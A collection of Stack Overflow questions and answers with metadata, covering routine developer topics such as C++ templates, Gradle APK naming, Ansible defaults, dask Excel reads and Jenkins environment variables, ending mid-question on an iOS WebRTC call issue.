Prometheus provides you different client libraries which can be used to instrument your application depending on the language you're using in your application/service.
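A minimal sketch of that idea with the official Python client (assumes pip install prometheus_client; the metric name and port are arbitrary):
from prometheus_client import Counter, start_http_server

BUTTON_CLICKS = Counter('button_clicks_total', 'Number of button clicks')

start_http_server(8000)   # exposes the /metrics endpoint for Prometheus to scrape
BUTTON_CLICKS.inc()       # call this wherever the click is handled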
| stackoverflow | {
"language": "en",
"length": 295,
"provenance": "stackexchange_0000F.jsonl.gz:900860",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654679"
} |
fb141497b8017090ee33f8765505576f0a4af74b | Stackoverflow Stackexchange
Q: Why does GCC 6.3 compile this Braced-Init-List code without explicit C++11 support? I have a question about the different meanings of a curly-brace enclosed list.
I know that C++03 did not support C++11's initializer_list. Yet, even without the -std=c++11 compiler flag, gcc 6.3 will properly initialize interpolate with this code:
map<string, string> interpolate = { { "F", "a && b && c" }, { "H", "p ^ 2 + w" }, { "K", "H > 10 || e < 5" }, { "J", "F && !K" } };
I was challenged on why this would work, and I realized I didn't have an answer. This is a Brace-Init-List, but the way we get from that to initializing a standard container is typically through an initializer_list. So how would non-C++11 code be accomplishing the initialization?
A: The default language standard for gcc 6.x is -std=gnu++14, so the compiler is implicitly compiling your code under a later version of the C++ standard.
You will need to manually specify -std=c++03 if you want to compile in C++03.
| Q: Why does GCC 6.3 compile this Braced-Init-List code without explicit C++11 support? I have a question about the different meanings of a curly-brace enclosed list.
I know that C++03 did not support C++11's initializer_list. Yet, even without the -std=c++11 compiler flag, gcc 6.3 will properly initialize interpolate with this code:
map<string, string> interpolate = { { "F", "a && b && c" }, { "H", "p ^ 2 + w" }, { "K", "H > 10 || e < 5" }, { "J", "F && !K" } };
I was challenged on why this would work, and I realized I didn't have an answer. This is a Brace-Init-List, but the way we get from that to initializing a standard container is typically through an initializer_list. So how would non-C++11 code be accomplishing the initialization?
A: The default language standard for gcc 6.x is -std=gnu++14, so the compiler is implicitly compiling your code under a later version of the C++ standard.
You will need to manually specify -std=c++03 if you want to compile in C++03.
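You can verify this from the command line (the file name is illustrative):
g++ -std=c++03 main.cpp   # rejected: list-initialization of the map needs C++11
g++ -std=c++11 main.cpp   # compiles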
| stackoverflow | {
"language": "en",
"length": 176,
"provenance": "stackexchange_0000F.jsonl.gz:900870",
"question_score": "13",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654713"
} |
c70e127f14c0267c224e768209cc3d5efb16a068 | Stackoverflow Stackexchange
Q: How to sort data using MongoDB Compass I'm currently trying to use MongoDB Compass to query my collection. However, I seem to be only able to filter the data.
Is there any way for me to sort the data as well? I would like to sort my data in ascending order using one of my data fields.
If MongoDB Compass isn't the best way to order a collection, what other GUI could I use?
A: Using MongoDB Compass 1.7 or newer, you can sort (and project, skip, or limit) results by choosing the Documents tab and expanding the Options.
To sort in ascending order by a field myField, use { myField:1 }. Any of the usual cursor sort() options can be provided, including ordering results by multiple fields.
Note: options like sort and skip are not available in the default Schema tab because this view uses sampling to find a random set of documents, as opposed to the Documents view which displays a specific query result.
| Q: How to sort data using MongoDB Compass I'm currently trying to use MongoDB Compass to query my collection. However, I seem to be only able to filter the data.
Is there any way for me to sort the data as well? I would like to sort my data in ascending order using one of my data fields.
If MongoDB Compass isn't the best way to order a collection, what other GUI could I use?
A: Using MongoDB Compass 1.7 or newer, you can sort (and project, skip, or limit) results by choosing the Documents tab and expanding the Options.
To sort in ascending order by a field myField, use { myField:1 }. Any of the usual cursor sort() options can be provided, including ordering results by multiple fields.
Note: options like sort and skip are not available in the default Schema tab because this view uses sampling to find a random set of documents, as opposed to the Documents view which displays a specific query result.
| stackoverflow | {
"language": "en",
"length": 167,
"provenance": "stackexchange_0000F.jsonl.gz:900872",
"question_score": "29",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654722"
} |
26eb7f98526e032bd594734b23b7f447c90753a3 | Stackoverflow Stackexchange
Q: How to link external diff tool(beyond compare) in source tree? I am using the SourceTree client for Git on Windows 7. I have used Beyond Compare with the TortoiseHg client for Mercurial, and I would like to use Beyond Compare as the diff tool in SourceTree too. I set the diff tool to Beyond Compare in Tools -> Options, but I am not sure how to launch the diff tool via SourceTree for any file. Double-clicking a file should usually bring up the diff view. Right-click -> Custom action also does nothing.
Beyond compare 3.3.13 & source tree 2.1.2.5
Please let me know how to configure this.
A: It works for me:
*
*After the installation, check whether you have set this in SourceTree options:
*Right click on the file(s) you want to compare and fire up Beyond Compare:
Beyond Compare 4.2.2 & SourceTree 2.1.2.5
Also please make sure your Beyond Compare trial period has not ended
| Q: How to link external diff tool(beyond compare) in source tree? I am using the SourceTree client for Git on Windows 7. I have used Beyond Compare with the TortoiseHg client for Mercurial, and I would like to use Beyond Compare as the diff tool in SourceTree too. I set the diff tool to Beyond Compare in Tools -> Options, but I am not sure how to launch the diff tool via SourceTree for any file. Double-clicking a file should usually bring up the diff view. Right-click -> Custom action also does nothing.
Beyond compare 3.3.13 & source tree 2.1.2.5
Please let me know how to configure this.
A: It works for me:
*
*After the installation, check whether you have set this in SourceTree options:
*Right click on the file(s) you want to compare and fire up Beyond Compare:
Beyond Compare 4.2.2 & SourceTree 2.1.2.5
Also please make sure your Beyond Compare trial period has not ended
A: In addition to file compare/merge, I use SourceTree custom actions in order to compare two commits as a folder comparison.
Assuming git & beyond compare in the PATH, you can add this following custom action in Sourcetree (Tools > Option > Custom Actions):
Script: git
Parameters: difftool -d --tool=bc4 $SHA
Tested with Sourcetree 3.4.8, git 2.35, beyond compare 4.4.2
A: The following worked for me in a few easy steps:
1. Configure git to use Beyond Compare as the diff and merge tools as per the official documentation:
https://www.scootersoftware.com/support.php?zz=kb_vcs#gitwindows
2. Set up a SourceTree custom action enabling diff with Beyond Compare by selecting two commits, similar to TortoiseHg:
SourceTree->Tools->Options->Custom Actions
Script to run: git
Parameters: difftool --dir-diff $SHA
| stackoverflow | {
"language": "en",
"length": 269,
"provenance": "stackexchange_0000F.jsonl.gz:900902",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654838"
} |
f91227249226aead1706eda2d35650457f9a581c | Stackoverflow Stackexchange
Q: Parallel excel sheet read from dask
Hello All the examples that I came across for using dask thus far has
been multiple csv files in a folder being read using dask read_csv
call.
if I am provided an xlsx file with multiple tabs, can I use anything
in dask to read them parallely?
P.S. I am using pandas 0.19.2 with python 2.7
A: For those using Python 3.6:
#reading the file using dask
import dask
import dask.dataframe as dd
from dask.delayed import delayed
import pandas as pd  # needed for pd.read_excel below
parts = dask.delayed(pd.read_excel)(excel_file, sheet_name=0, usecols = [1, 2, 7])
df = dd.from_delayed(parts)
print(df.head())
I'm seeing a 50% speed increase on load on an i7, 16GB 5th Gen machine.
| Q: Parallel excel sheet read from dask
Hello. All the examples that I have come across for using dask thus far have
been multiple CSV files in a folder being read using the dask read_csv
call.
If I am provided an xlsx file with multiple tabs, can I use anything
in dask to read them in parallel?
P.S. I am using pandas 0.19.2 with python 2.7
A: For those using Python 3.6:
#reading the file using dask
import dask
import dask.dataframe as dd
from dask.delayed import delayed
import pandas as pd  # needed for pd.read_excel below
parts = dask.delayed(pd.read_excel)(excel_file, sheet_name=0, usecols = [1, 2, 7])
df = dd.from_delayed(parts)
print(df.head())
I'm seeing a 50% speed increase on load on an i7, 16GB 5th Gen machine.
A: A simple example
fn = 'my_file.xlsx'
parts = [dask.delayed(pd.read_excel)(fn, i, **other_options)
for i in range(number_of_sheets)]
df = dd.from_delayed(parts, meta=parts[0].compute())
Assuming you provide the "other options" to extract the data (which is uniform across sheets) and you want to make a single master data-frame out of the set.
Note that I don't know the internals of the excel reader, so how parallel the reading/parsing part would be is uncertain, but subsequent computations once the data are in memory would definitely be.
| stackoverflow | {
"language": "en",
"length": 193,
"provenance": "stackexchange_0000F.jsonl.gz:900926",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654906"
} |
9ade63bf9bf1005aaaea1fc13b63c52b0b501797 | Stackoverflow Stackexchange
Q: Set twig variable to json file as an include I have created twig templates and save all the content in a jsonfile. Like this:
Json Data:
{% set contentElements = {
"json structur": {....}
"json structur": {....}
%}
Unfortunately, over the years the JSON files have become bigger and bigger.
So I want to split the JSON data into snippets.
Is it possible to set the variable contentElements to an include?
It is not working, but something like this:
{% set contentElements = include"content.json "%}
It's a static HTML project.
A: To capture chunks of text it is better to use the {% set var %}/{% endset %} tag. This allows you to assign "larger" amount of data to a variable. It's also possible to pass content from another file to the variable this way in combination with include.
{% set json %}
{% include "content.json" %}
{% endset %}
{{ json }}
(sidenote: Content captured as chunk is being treated as safe)
| Q: Set twig variable to json file as an include I have created twig templates and save all the content in a jsonfile. Like this:
Json Data:
{% set contentElements = {
"json structur": {....}
"json structur": {....}
%}
Unfortunately, over the years the JSON files have become bigger and bigger.
So I want to split the JSON data into snippets.
Is it possible to set the variable contentElements to an include?
It is not working, but something like this:
{% set contentElements = include"content.json "%}
It's a static HTML project.
A: To capture chunks of text it is better to use the {% set var %}/{% endset %} tag. This allows you to assign "larger" amount of data to a variable. It's also possible to pass content from another file to the variable this way in combination with include.
{% set json %}
{% include "content.json" %}
{% endset %}
{{ json }}
(sidenote: Content captured as chunk is being treated as safe)
| stackoverflow | {
"language": "en",
"length": 164,
"provenance": "stackexchange_0000F.jsonl.gz:900940",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654948"
} |
4f288226dcad9006643755d42f5fa607ab972489 | Stackoverflow Stackexchange
Q: How to express sequence of numbers in yaml Is there any method to express a sequence of numbers in YAML?
To get a sequence from 1 to 100, I can use list(range(1,101)) in Python, or seq(1,100) in R. But do we have any similar way for a YAML file?
A: No you cannot, there is no such provision in any of the YAML specifications.
Of course the program that interprets the YAML file could create an object for the tag !range and substitute its nodes with a range:
abc: !range
- 0
- 100
but that is at the application level, and YAML doesn't know anything about it.
| Q: How to express sequence of numbers in yaml Is there any method to express a sequence of numbers in YAML?
To get a sequence from 1 to 100, I can use list(range(1,101)) in Python, or seq(1,100) in R. But do we have any similar way for a YAML file?
A: No you cannot, there is no such provision in any of the YAML specifications.
Of course the program that interprets the YAML file could create an object for the tag !range and substitute its nodes with a range:
abc: !range
- 0
- 100
but that is at the application level, and YAML doesn't know anything about it.
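As a sketch of that application-level handling with PyYAML (the !range constructor below is an illustrative assumption, not part of YAML itself):
import yaml
def range_constructor(loader, node):
    start, stop = loader.construct_sequence(node)
    return list(range(start, stop + 1))  # inclusive, so [0, 100] yields 0..100
yaml.SafeLoader.add_constructor('!range', range_constructor)
data = yaml.safe_load("abc: !range [0, 100]")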
| stackoverflow | {
"language": "en",
"length": 108,
"provenance": "stackexchange_0000F.jsonl.gz:900961",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44654997"
} |
d81b37b1314115beca5309f0bc1faabf0962a607 | Stackoverflow Stackexchange
Q: Thymeleaf: HTML tag inside a th:text Is it possible to have an HTML tag inside a th:text?
for instance:
<h2 th:text="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime} ">
A: Yes, what you have works if you use th:utext instead of th:text.
<h2 th:utext="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime}" />
I would personally format it like this, however:
<h2>
LOCATION INFO Device
<strong th:text="${deviceKey}" />
at
<span th:text="${deviceEventTime}" />
</h2>
(Which may or may not be possible, depending on your actual requirements.)
| Q: Thymeleaf: HTML tag inside a th:text Is it possible to have an HTML tag inside a th:text?
for instance:
<h2 th:text="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime} ">
A: Yes, what you have works if you use th:utext instead of th:text.
<h2 th:utext="'LOCATION INFO Device <strong>' + ${deviceKey} + ' </strong> at ' + ${deviceEventTime}" />
I would personally format it like this, however:
<h2>
LOCATION INFO Device
<strong th:text="${deviceKey}" />
at
<span th:text="${deviceEventTime}" />
</h2>
(Which may or may not be possible, depending on your actual requirements.)
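As a side note, Thymeleaf's literal substitution syntax (|...|) can make the th:utext concatenation easier to read; a minimal sketch, assuming the same model attributes:
<h2 th:utext="|LOCATION INFO Device <strong>${deviceKey}</strong> at ${deviceEventTime}|"></h2>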
| stackoverflow | {
"language": "en",
"length": 94,
"provenance": "stackexchange_0000F.jsonl.gz:901006",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655138"
} |
0e7842321c352efe0885b46c00c644bf737855a1 | Stackoverflow Stackexchange
Q: c++: why template cannot be used to deduce both container and element type? I've got a very simple test program like below:
#include<vector>
#include<iostream>
using namespace std;
template<typename C, typename E>
void f(const C<E>& container){
cout<<container.size()<<endl;
}
int main(){
vector<int> i;
f(i);
return 0;
}
It fails to compile with gcc 4.1.2. Error message is:
templateContainer.cpp:5: error: ‘C’ is not a template
templateContainer.cpp: In function ‘int main()’:
templateContainer.cpp:10: error: no matching function for call to ‘f(std::vector<int, std::allocator<int> >&)’
A: std::vector has two template arguments, type and allocator.
template <template<class, class> class C, class E, class A>
void f(const C<E, A> &container)
{
std::cout << container.size() << std::endl;
}
int main()
{
std::vector<int> i;
f(i);
return 0;
}
| Q: c++: why template cannot be used to deduce both container and element type? I've got a very simple test program like below:
#include<vector>
#include<iostream>
using namespace std;
template<typename C, typename E>
void f(const C<E>& container){
cout<<container.size()<<endl;
}
int main(){
vector<int> i;
f(i);
return 0;
}
It fails to compile with gcc 4.1.2. Error message is:
templateContainer.cpp:5: error: ‘C’ is not a template
templateContainer.cpp: In function ‘int main()’:
templateContainer.cpp:10: error: no matching function for call to ‘f(std::vector<int, std::allocator<int> >&)’
A: std::vector has two template arguments, type and allocator.
template <template<class, class> class C, class E, class A>
void f(const C<E, A> &container)
{
std::cout << container.size() << std::endl;
}
int main()
{
std::vector<int> i;
f(i);
return 0;
}
A: Although WhiZTiM's answer is correct (well, preferring the second part), it doesn't explain why your code doesn't work.
Assuming for the moment that you intended roughly
template<template <typename> class C, typename E> void f(const C<E>&);
the reason that std::vector doesn't match is that it is the wrong shape - it has two type parameters, not one as in your declaration.
Just because you don't often explicitly write the defaulted second (allocator) param, doesn't mean it isn't there.
For comparison, this works (or doesn't) in an analogous way:
void f(int);
void g(int, int* = nullptr);
void apply(void (*func)(int), int);
apply(f, 42); // ok - f matches shape void(*)(int)
apply(g, 42); // error - g is really void(*)(int,int*)
Specifically, default arguments (or type parameters) are syntactic sugar. They allow you to forget about those arguments at the call (instantiation) site, but don't change the shape of the function (or template).
A: You could use a template template parameter (and note that std::vector actually takes more than one template parameter [an element type, and an allocator type]).:
template<template <typename...> class C, typename... E>
void f(const C<E...>& container){
cout<<container.size()<<endl;
}
Live Demo
If you don't need the type decompositions, you could simply use an ordinary template.
template<typename C>
void f(const C& container){
cout<<container.size()<<endl;
}
You can additionally obtain typedefs from STL containers: for example, if you want to know the type of elements held by the container, value_type is there for you.
template<typename C>
void f(const C& container){
using ValueType = typename C::value_type;
cout<<container.size()<<endl;
}
| stackoverflow | {
"language": "en",
"length": 370,
"provenance": "stackexchange_0000F.jsonl.gz:901035",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655222"
} |
69aae1a771fa6111b960416a15d8d0c72e778aba | Stackoverflow Stackexchange
Q: Is the same a package.json and a composer.json? Hello, I would like to know if a package.json is the same as a composer.json.
I need to create one file with some content; I'm required to put it in a package.json file, but there is already a composer.json in the project. So can I work in this file, or do they work differently?
Thanks
A: Best difference between composer.json & package.json file.
composer.json
*
*Composer is a package manager tool for PHP.
*composer.json manages the PHP dependencies.
*For example, composer require fzaninotto/faker. This command will open and write to the composer.json file and download all the dependencies.
package.json
*
*package.json manages the Node dependencies.
*All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. This file is used to give information to npm that allows it to identify the project as well as handle the project's dependencies.
| Q: Is the same a package.json and a composer.json? Hello, I would like to know if a package.json is the same as a composer.json.
I need to create one file with some content; I'm required to put it in a package.json file, but there is already a composer.json in the project. So can I work in this file, or do they work differently?
Thanks
A: Best difference between composer.json & package.json file.
composer.json
*
*Composer is a package manager tool for PHP.
*composer.json manages the PHP dependencies.
*For example, composer require fzaninotto/faker. This command will open and write to the composer.json file and download all the dependencies.
package.json
*
*package.json manages the Node dependencies.
*All npm packages contain a file, usually in the project root, called package.json - this file holds various metadata relevant to the project. This file is used to give information to npm that allows it to identify the project as well as handle the project's dependencies.
A: They are different files. composer.json is for Composer, a package manager for PHP, whereas package.json is for NPM or Yarn, primarily used together with Node.js.
A: In addition to the information you've already been given, about package.json being a file to manage Node dependencies, there is another possibility.
Composer also uses a packages.json file (note the plural) to define a composer repository. It consists of composer.json objects together with information about where to download the files from. https://getcomposer.org/doc/04-schema.md#repositories
Your question's unclear about what you're trying to do. Whilst you tagged javascript, you don't mention it anywhere in the question itself.
A: They are not the same
*
*package.json is an npm file to keep track of npm packages.
*composer.json is a Composer file to keep track of PHP packages.
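To make the contrast concrete, here are minimal sketches of each file (names and versions are illustrative assumptions). A package.json for npm/Node.js:
{
  "name": "my-app",
  "version": "1.0.0",
  "dependencies": { "lodash": "^4.17.0" }
}
And a composer.json for Composer/PHP:
{
  "name": "vendor/my-app",
  "require": { "fzaninotto/faker": "^1.6" }
}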
| stackoverflow | {
"language": "en",
"length": 289,
"provenance": "stackexchange_0000F.jsonl.gz:901036",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655224"
} |
73f6e1929ec7e4ca94ff2daecb7441bbb35acb2b | Stackoverflow Stackexchange
Q: Jenkins Environment variables giving null values as output I am trying to access github env.CHANGE_AUTHOR environment variable from groovy script in jenkins multibranch pipeline.
While some of the environment variables are giving correct output (for example env.JOB_NAME,env.BRANCH_NAME), others like env.CHANGE_AUTHOR_DISPLAY_NAME ,env.CHANGE_AUTHOR_EMAIL are giving null values.
Has anybody come across this issue before? What can be the problem?
A: I've just tested with the github org plugin which uses the multi branch plugin, created a PR and the CI job it does has those env vars present. Using a Jenkinsfile:
node {
echo "${env.getEnvironment()}"
}
In my Jenkins PR build console I see amongst others:
CHANGE_AUTHOR:rawlingsj, CHANGE_AUTHOR_DISPLAY_NAME:James Rawlings, CHANGE_AUTHOR_EMAIL:[email protected], CHANGE_ID:1, CHANGE_TARGET:master, CHANGE_TITLE:test msg, CHANGE_URL:https://github.com/rawlingsj/multi-branch-test/pull/1
Just a wild guess... do you have your git config user.name and git config user.email set on the commit in the PR? If so, it's worth mentioning which version of the multi-branch plugin you're using, and upgrading to the latest if it's old.
| Q: Jenkins Environment variables giving null values as output I am trying to access github env.CHANGE_AUTHOR environment variable from groovy script in jenkins multibranch pipeline.
While some of the environment variables are giving correct output (for example env.JOB_NAME,env.BRANCH_NAME), others like env.CHANGE_AUTHOR_DISPLAY_NAME ,env.CHANGE_AUTHOR_EMAIL are giving null values.
Has anybody come across this issue before? What can be the problem?
A: I've just tested with the github org plugin which uses the multi branch plugin, created a PR and the CI job it does has those env vars present. Using a Jenkinsfile:
node {
echo "${env.getEnvironment()}"
}
In my Jenkins PR build console I see amongst others:
CHANGE_AUTHOR:rawlingsj, CHANGE_AUTHOR_DISPLAY_NAME:James Rawlings, CHANGE_AUTHOR_EMAIL:[email protected], CHANGE_ID:1, CHANGE_TARGET:master, CHANGE_TITLE:test msg, CHANGE_URL:https://github.com/rawlingsj/multi-branch-test/pull/1
Just a wild guess... do you have your git config user.name and git config user.email set on the commit in the PR? If so, it's worth mentioning which version of the multi-branch plugin you're using, and upgrading to the latest if it's old.
A: I think this is related to an existing bug where the git environment variables are always null:
https://issues.jenkins-ci.org/browse/JENKINS-36436
It looks like it was very recently fixed in this PR:
https://github.com/jenkinsci/git-plugin/pull/492
| stackoverflow | {
"language": "en",
"length": 189,
"provenance": "stackexchange_0000F.jsonl.gz:901040",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655235"
} |
7b3b31c200c24ee7ad68095c73c72ee4c43613dc | Stackoverflow Stackexchange
Q: Set variable if empty or not defined with ansible In my ansible vars file, I have a variable that will sometimes be set and other times I want to dynamically set it. For example, I have an RPM that I want to install. I can manually store the location in a variable, or if I don't have a particular one in mind, I want to pull the latest from Jenkins. My question is, how can I check if the variable is not defined or empty, and if so, just use the default from Jenkins (already stored in a var)?
Here is what I have in mind:
...code which gets host_vars[jenkins_rpm]
- hosts: "{{ host }}"
tasks:
- name: Set Facts
set_fact:
jenkins_rpm: "{{ hostvars['localhost']['jenkins_rpm'] }}"
- name: If my_rpm is empty or not defined, just use the jenkins_rpm
set_fact: my_rpm=jenkins_rpm
when: !my_rpm | my_rpm == ""
A: There is a default filter for that:
- set_fact:
my_rpm: "{{ my_rpm | default(jenkins_rpm) }}"
| Q: Set variable if empty or not defined with ansible In my ansible vars file, I have a variable that will sometimes be set and other times I want to dynamically set it. For example, I have an RPM that I want to install. I can manually store the location in a variable, or if I don't have a particular one in mind, I want to pull the latest from Jenkins. My question is, how can I check if the variable is not defined or empty, and if so, just use the default from Jenkins (already stored in a var)?
Here is what I have in mind:
...code which gets host_vars[jenkins_rpm]
- hosts: "{{ host }}"
tasks:
- name: Set Facts
set_fact:
jenkins_rpm: "{{ hostvars['localhost']['jenkins_rpm'] }}"
- name: If my_rpm is empty or not defined, just use the jenkins_rpm
set_fact: my_rpm=jenkins_rpm
when: !my_rpm | my_rpm == ""
A: There is a default filter for that:
- set_fact:
my_rpm: "{{ my_rpm | default(jenkins_rpm) }}"
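Note that default() alone only covers the undefined case; if my_rpm can also be defined but empty (as the question allows), Jinja2's default filter accepts a second boolean argument that treats empty or otherwise falsy values as undefined too:
- set_fact:
    my_rpm: "{{ my_rpm | default(jenkins_rpm, true) }}"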
| stackoverflow | {
"language": "en",
"length": 162,
"provenance": "stackexchange_0000F.jsonl.gz:901053",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655267"
} |
5a2f2595cd86cb7d8572c5dc618b62b85d2be502 | Stackoverflow Stackexchange
Q: change apk filename in gradle I am trying to use android build tools "com.android.tools.build:gradle:3.0.0-alpha4" in my project. In my build script I rename the output apk which worked fine in the past but does not seem to be supported any more.
applicationVariants.all { variant ->
def filename = "foo-${variant.baseName}-${variant.versionName}-(${android.defaultConfig.versionCode}).apk"
variant.outputs.all { output ->
output.outputFile = new File(
output.outputFile.parent,
filename
)
}
}
Now the property I am trying to change has become immutable:
Error: Cannot set the value of read-only property 'outputFile' for ApkVariantOutputImpl_Decorated{apkData=Main{type=MAIN, fullName=stageDebug, filters=[]}} of type com.android.build.gradle.internal.api.ApkVariantOutputImpl.
Is there a new or an alternate way how to do this?
A: *
*Change each -> to all
*Change output.outputFile -> to outputFileName
before:
android.applicationVariants.all { variant ->
variant.outputs.each { output ->
def finalVersionCode = 10000 + versionCode
output.versionCodeOverride = finalVersionCode
output.outputFile = new File(
output.outputFile.parent, output.outputFile.name.replace(".apk","-${finalVersionCode}.apk"))
}
}
after:
android.applicationVariants.all { variant ->
variant.outputs.all { output ->
def finalVersionCode = 10000 + versionCode
output.versionCodeOverride = finalVersionCode
// outputFileName must remain a plain file name; wrapping it in a File with a
// parent path produces an absolute path, which the new plugin rejects
outputFileName = outputFileName.replace(".apk", "-${finalVersionCode}.apk")
}
}
| Q: change apk filename in gradle I am trying to use android build tools "com.android.tools.build:gradle:3.0.0-alpha4" in my project. In my build script I rename the output apk which worked fine in the past but does not seem to be supported any more.
applicationVariants.all { variant ->
def filename = "foo-${variant.baseName}-${variant.versionName}-(${android.defaultConfig.versionCode}).apk"
variant.outputs.all { output ->
output.outputFile = new File(
output.outputFile.parent,
filename
)
}
}
Now the property I am trying to change has become immutable:
Error: Cannot set the value of read-only property 'outputFile' for ApkVariantOutputImpl_Decorated{apkData=Main{type=MAIN, fullName=stageDebug, filters=[]}} of type com.android.build.gradle.internal.api.ApkVariantOutputImpl.
Is there a new or an alternate way how to do this?
A: *
*Change each -> to all
*Change output.outputFile -> to outputFileName
before:
android.applicationVariants.all { variant ->
variant.outputs.each { output ->
def finalVersionCode = 10000 + versionCode
output.versionCodeOverride = finalVersionCode
output.outputFile = new File(
output.outputFile.parent, output.outputFile.name.replace(".apk","-${finalVersionCode}.apk"))
}
}
after:
android.applicationVariants.all { variant ->
variant.outputs.all { output ->
def finalVersionCode = 10000 + versionCode
output.versionCodeOverride = finalVersionCode
// outputFileName must remain a plain file name; wrapping it in a File with a
// parent path produces an absolute path, which the new plugin rejects
outputFileName = outputFileName.replace(".apk", "-${finalVersionCode}.apk")
}
}
A: Add e.g. the versionName to the APK file name by adding
setProperty("archivesBaseName", archivesBaseName + "-" + versionName)
in the defaultConfig closure.
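In context, that looks roughly like the following sketch (the versionName value is an assumption):
android {
    defaultConfig {
        versionName "1.2.3"
        // yields e.g. MyApp-1.2.3-release.apk instead of MyApp-release.apk
        setProperty("archivesBaseName", archivesBaseName + "-" + versionName)
    }
}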
| stackoverflow | {
"language": "en",
"length": 182,
"provenance": "stackexchange_0000F.jsonl.gz:901092",
"question_score": "5",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655405"
} |
d7fdb71d162c5381f461c00423b7eb326cddfa17 | Stackoverflow Stackexchange
Q: How to install Google-Recaptcha from npm I'm implementing recaptcha in my webapp in some forms.
I already implemented my backend part and I'm now trying to install the reCAPTCHA API.
Unfortunately, I cannot find an official npm package from Google.
Should I use the package googleapis that includes reCAPTCHA, or
should I include this script:
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
I'm asking this because I build my script files (including all vendors coming from npm) with Webpack.
A: You can just use google reCAPTCHA v3 without any npm hassle.
Register from here : https://www.google.com/recaptcha/admin/create
Then for front-end:
<script src="https://www.google.com/recaptcha/api.js?render=reCAPTCHA_site_key"></script>
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'}).then(function(token) {
...
});
});
</script>
In v3 you can define your actions or pass your intent
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'});
});
</script>
| Q: How to install Google-Recaptcha from npm I'm implementing recaptcha in my webapp in some forms.
I already implemented my backend part and I'm now trying to install the reCAPTCHA API.
Unfortunately, I cannot find an official npm package from Google.
Should I use the package googleapis that includes reCAPTCHA, or
should I include this script:
<script src="https://www.google.com/recaptcha/api.js" async defer></script>
I'm asking this because I build my script files (including all vendors coming from npm) with Webpack.
A: You can just use google reCAPTCHA v3 without any npm hassle.
Register from here : https://www.google.com/recaptcha/admin/create
Then for front-end:
<script src="https://www.google.com/recaptcha/api.js?render=reCAPTCHA_site_key"></script>
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'}).then(function(token) {
...
});
});
</script>
In v3 you can define your actions or pass your intent
<script>
grecaptcha.ready(function() {
grecaptcha.execute('reCAPTCHA_site_key', {action: 'homepage'});
});
</script>
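Since api.js has to be served by Google rather than bundled, a common workaround in a webpack build is to inject it at runtime from your bundled code; a minimal sketch (the function name and promise wrapping are assumptions):
function loadRecaptcha(siteKey) {
  return new Promise((resolve, reject) => {
    const script = document.createElement('script');
    script.src = `https://www.google.com/recaptcha/api.js?render=${siteKey}`;
    script.async = true;
    script.defer = true;
    script.onload = () => resolve(window.grecaptcha); // grecaptcha is defined by the loaded script
    script.onerror = reject;
    document.head.appendChild(script);
  });
}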
| stackoverflow | {
"language": "en",
"length": 134,
"provenance": "stackexchange_0000F.jsonl.gz:901109",
"question_score": "9",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655445"
} |
b13e9e3678d1290731e1aa5e128e05eeee110b10 | Stackoverflow Stackexchange
Q: Visual Studio 2017 debugger issues with ASP.NET Core When I debug ASP.NET Core applications in Visual Studio 2017 I can't preview the content of variables by hovering over them, nor use the Immediate Window, the Autos/Locals tabs, or Quick Watch (I get Could not evaluate expression).
I tried both running the app in Kestrel and in IIS Express and I tried enabling Use Managed Compatibility Mode.
Doesn't work with .NET Core console app either.
Still no update from Microsoft: https://developercommunity.visualstudio.com/content/problem/70835/cannot-preview-variables-aspnet-core.html
| Q: Visual Studio 2017 debugger issues with ASP.NET Core When I debug ASP.NET Core applications in Visual Studio 2017 I can't preview the content of variables by hovering over them, nor use the Immediate Window, the Autos/Locals tabs, or Quick Watch (I get Could not evaluate expression).
I tried both running the app in Kestrel and in IIS Express and I tried enabling Use Managed Compatibility Mode.
Doesn't work with .NET Core console app either.
Still no update from Microsoft: https://developercommunity.visualstudio.com/content/problem/70835/cannot-preview-variables-aspnet-core.html
| stackoverflow | {
"language": "en",
"length": 81,
"provenance": "stackexchange_0000F.jsonl.gz:901119",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44655467"
} |
0714d97d5165c043dd8de9d13c83f01c4943d8ea | Stackoverflow Stackexchange
Q: iOS App > Failed to set remote offer sdp: Called with SDP without DTLS fingerprint I'm using the RestComm SDK with freeSWITCH SDP in an iOS app,
and I'm trying to call from user A to user B.
The call connects successfully on both devices, and I answer the call using the function below:
- (IBAction)tappedOnAnswer:(id)sender {
if (self.connection != nil) {
